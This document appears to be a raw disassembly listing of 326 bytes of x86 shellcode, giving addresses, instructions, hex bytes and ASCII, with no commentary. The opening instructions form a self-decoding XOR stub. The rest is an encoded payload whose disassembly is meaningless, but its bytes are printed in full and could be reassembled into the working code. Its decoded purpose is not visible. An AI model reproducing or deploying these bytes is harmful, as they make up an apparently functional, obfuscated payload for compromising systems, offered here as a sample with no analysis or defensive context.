0x0        fcmovu st(0), st(6)                 \xda\xde                  ..        
     label_0x2:
0x2        fnstenv [esp - 0xc]                 \xd9\x74\x24\xf4          .t$.      
0x6        mov eax, 0x7a27d222                 \xb8\x22\xd2\x27\x7a      .".'z     
0xb        sub ecx, ecx                        \x29\xc9                  ).        
0xd        mov cl, 0x4b                        \xb1\x4b                  .K        
0xf        pop ebx                             \x5b                      [         
0x10       xor dword ptr [ebx + 0x1a], eax     \x31\x43\x1a              1C.       
0x13       sub ebx, -4                         \x83\xeb\xfc              ...       
     label_0x16:
0x16       add eax, dword ptr [ebx + 0x16]     \x03\x43\x16              .C.       
0x19       db 0xe2 (!)                        \xe2                      .         
0x1a       db 0xd7 (!)                        \xd7                      .         
0x1b       cmp edi, dword ptr [edx + edi*2 + 0x4b95bc17] \x3b\xbc\x7a\x17\xbc\x95\x4b;.z...K   
0x22       xlatb                               \xd7                      .         
0x23       fcom dword ptr [edx + 0x65a5e7ec]   \xd8\x92\xec\xe7\xa5\x65  .....e    
0x29       xchg eax, esp                       \x94                      .         
0x2a       or byte ptr [0x419d6925], ch        \x08\x2d\x25\x69\x9d\x41  .-%i.A    
0x30       mov edx, 0xcae12adc                 \xba\xdc\x2a\xe1\xca      ..*..     
0x35       mul dword ptr [0xbe07cae2]          \xf7\x25\xe2\xca\x07\xbe  .%....    
0x3b       mov byte ptr [0x5e808afe], al       \xa2\xfe\x8a\x80\x5e      ....^     
0x40       je 0x16                             \x74\xd4                  t.        

0x42       cmp al, 0xc1                        \x3c\xc1                  <.        
0x44       dec ecx                             \x49                      I         
0x45       mov ch, 0xb7                        \xb5\xb7                  ..        
0x47       xchg eax, ecx                       \x91                      .         
0x48       imul edx, dword ptr [edx], 0xd14e2c4c \x69\x12\x4c\x2c\x4e\xd1  i.L,N.    
0x4e       push es                             \x06                      .         
0x4f       stosb byte ptr es:[edi], al         \xaa                      .         
0x50       salc                                \xd6                      .         
0x51       in al, 0x4c                         \xe4\x4c                  .L        
0x53       aas                                 \x3f                      ?         
0x54       insb byte ptr es:[edi], dx          \x6c                      l         
0x55       lcall [ebx]                         \xff\x1b                  ..        
0x57       sbb dl, byte ptr [ecx - 2]          \x1a\x51\xfe              .Q.       
0x5a       db 0xf0                             \xf0                      .         
0x5b       js 2                                \x78\xa5                  x.        

0x5d       dec ecx                             \x49                      I         
0x5e       lea ecx, [ebx + 0x4d]               \x8d\x4b\x4d              .KM       
0x61       dec eax                             \x48                      H         
0x62       db 0x7f (!)                        \x7f                      .         
0x63       db 0x82 (!)                        \x82                      .         
0x64       db 0xae (!)                        \xae                      .         
0x65       db 0x7a (!)                        \x7a                      z         
0x66       db 0xbf (!)                        \xbf                      .         
0x67       sbb esp, edi                        \x19\xfc                  ..        
0x69       stc                                 \xf9                      .         
0x6a       call dword ptr [esi + 0x5b30c0fa]   \xff\x96\xfa\xc0\x30\x5b  ....0[    
0x70       add al, 4                           \x04\x04                  ..        
0x72       and eax, 0x9df63d90                 \x25\x90\x3d\xf6\x9d      %.=..     
0x77       jno 0xb0                            \x71\x37                  q7        

0x79       out 0x56, eax                       \xe7\x56                  .V        
0x7b       fist dword ptr [ebx + 0x50ba83e6]   \xdb\x93\xe6\x83\xba\x50  .....P    
0x81       in al, 0x18                         \xe4\x18                  ..        
0x83       enter -0x16c3, -0x61                \xc8\x3d\xe9\x9f          .=..      
0x87       and eax, 0xb814154a                 \x25\x4a\x15\x14\xb8      %J...     
0x8c       movsd dword ptr es:[edi], dword ptr [esi] \xa5                      .         
0x8d       lahf                                \x9f                      .         
0x8e       outsb dx, byte ptr [esi]            \x6e                      n         
0x8f       lahf                                \x9f                      .         
0x90       sub ecx, eax                        \x29\xc1                  ).        
0x92       lodsd eax, dword ptr [esi]          \xad                      .         
0x93       jb 0x96                             \x72\x01                  r.        

0x95       push ebx                            \x53                      S         
     label_0x96:
0x96       fldenv [edi]                        \xd9\x27                  .'        
0x98       pop ebp                             \x5d                      ]         
0x99       lodsb al, byte ptr [esi]            \xac                      .         
0x9a       out 0xb1, al                        \xe6\xb1                  ..        
0x9c       movsd dword ptr es:[edi], dword ptr [esi] \xa5                      .         
0x9d       rcr ah, cl                          \xd2\xdc                  ..        
0x9f       retf 0xd4a9                         \xca\xa9\xd4              ...       
0xa2       fmul qword ptr [ebx + 0x6e]         \xdc\x4b\x6e              .Kn       
0xa5       rcr ah, 1                           \xd0\xdc                  ..        
0xa7       dec ebx                             \x4b                      K         
0xa8       db 0x71 (!)                        \x71                      q         
0xa9       db 0xe0 (!)                        \xe0                      .         
0xaa       adc bh, byte ptr [esi]              \x12\x3e                  .>        
0xac       xchg eax, edi                       \x97                      .         
0xad       rol dword ptr [edx - 0x28], 1       \xd1\x42\xd8              .B.       
     label_0xb0:
0xb0       push edi                            \x57                      W         
0xb1       salc                                \xd6                      .         
0xb2       xchg eax, edx                       \x92                      .         
0xb3       inc ebx                             \x43                      C         
0xb4       test eax, 0x8e0d9c5c                \xa9\x5c\x9c\x0d\x8e      .\...     
0xb9       adc ebx, 0x70                       \x83\xd3\x70              ..p       
0xbc       ret 0x134c                          \xc2\x4c\x13              .L.       

0xbf       db 0x73 (!)                        \x73                      s         
0xc0       db 0x1b (!)                        \x1b                      .         
0xc1       db 0xc4                             \xc4                      .         
0xc2       neg byte ptr [ebx - 0x5bf8d6bd]     \xf6\x9b\x43\x29\x07\xa4  ..C)..    
0xc8       std                                 \xfd                      .         
0xc9       pop ss                              \x17                      .         
0xca       sbb al, 0xb9                        \x1c\xb9                  ..        
0xcc       mov al, byte ptr [0xd43a9f1a]       \xa0\x1a\x9f\x3a\xd4      ...:.     
0xd1       aam 0xde                            \xd4\xde                  ..        
0xd3       sub dh, 0x16                        \x82\xee\x16              ...       
0xd6       db 0xe0 (!)                        \xe0                      .         
0xd7       db 0x04 (!)                        \x04                      .         
0xd8       pop es                              \x07                      .         
0xd9       mov al, byte ptr [0x2628fb1f]       \xa0\x1f\xfb\x28\x26      ...(&     
0xde       rcr dword ptr [edi - 0x1a], 1       \xd1\x5f\xe6              ._.       
0xe1       db 0x79 (!)                        \x79                      y         
0xe2       db 0xbd (!)                        \xbd                      .         
0xe3       or al, 0xf7                         \x0c\xf7                  ..        
0xe5       das                                 \x2f                      /         
0xe6       cmp dword ptr [edx - 0x4e417f39], eax \x39\x82\xc7\x80\xbe\xb1  9.....    
0xec       iretd                               \xcf                      .         
0xed       enter -0x3a53, 0x2f                 \xc8\xad\xc5\x2f          .../      
0xf1       test dword ptr [esi + 0x57], 0xdff526b4 \xf7\x4e\x57\xb4\x26\xf5\xdf.NW.&..   
0xf8       push ecx                            \x51                      Q         
0xf9       pop ss                              \x17                      .         
0xfa       fidivr dword ptr [edx + edi*4 + 0x39] \xda\x7c\xba\x39          .|.9      
0xfe       inc ecx                             \x41                      A         
0xff       neg dword ptr [edx - 0x576d0550]    \xf7\x9a\xb0\xfa\x92\xa8  ......    
0x105      sbb cl, byte ptr [edi + 0x62e2e39]  \x1a\x8f\x39\x2e\x2e\x06  ..9...    
0x10b      cmpsb byte ptr [esi], byte ptr es:[edi] \xa6                      .         
0x10c      xor al, 0xb5                        \x80\xf0\xb5              ...       
0x10f      push ss                             \x16                      .         
0x110      db 0x8f                             \x8f                      .         
0x111      wait                                \x9b                      .         
0x112      db 0x65 (!)                        \x65                      e         
0x113      db 0x78 (!)                        \x78                      x         
0x114      db 0x2e (!)                        \x2e                      .         
0x115      cmp byte ptr [ecx], al              \x38\x01                  8.        
0x117      cmpsb byte ptr [esi], byte ptr es:[edi] \xa6                      .         
0x118      xchg eax, esi                       \x96                      .         
0x119      out 0xe9, al                        \xe6\xe9                  ..        
0x11b      enter -0x6d4d, -0x37                \xc8\xb3\x92\xc9          ....      
0x11f      db 0x78 (!)                        \x78                      x         
0x120      db 0x53 (!)                        \x53                      S         
0x121      cmp byte ptr [eax - 0x13], ch       \x38\x68\xed              8h.       
0x124      int3                                \xcc                      .         
0x125      int3                                \xcc                      .         
0x126      add eax, 0xb8116298                 \x05\x98\x62\x11\xb8      ..b..     
0x12b      push es                             \x06                      .         
0x12c      out dx, al                          \xee                      .         
0x12d      cmp byte ptr [esi + ebp*4 - 0x7d], dl \x38\x54\xae\x83          8T..      
0x131      into                                \xce                      .         
0x132      ficom dword ptr [ecx + 0x10]        \xda\x51\x10              .Q.       
0x135      inc eax                             \x40                      @         
0x136      push 0xe9edf8e1                     \x68\xe1\xf8\xed\xe9      h....     
0x13b      db 0x66                             \x66                      f         
0x13c      db 0x8c                             \x8c                      .         
0x13d      db 0x78 (!)                        \x78                      x         
0x13e      db 0x95 (!)                        \x95                      .         
0x13f      pop eax                             \x58                      X         
0x140      dec esi                             \x4e                      N         
0x141      push esp                            \x54                      T         
0x142      xor al, 0xfd                        \x34\xfd                  4.        
0x144      db 0xea                             \xea                      .         
0x145      stosb byte ptr es:[edi], al         \xaa                      .         
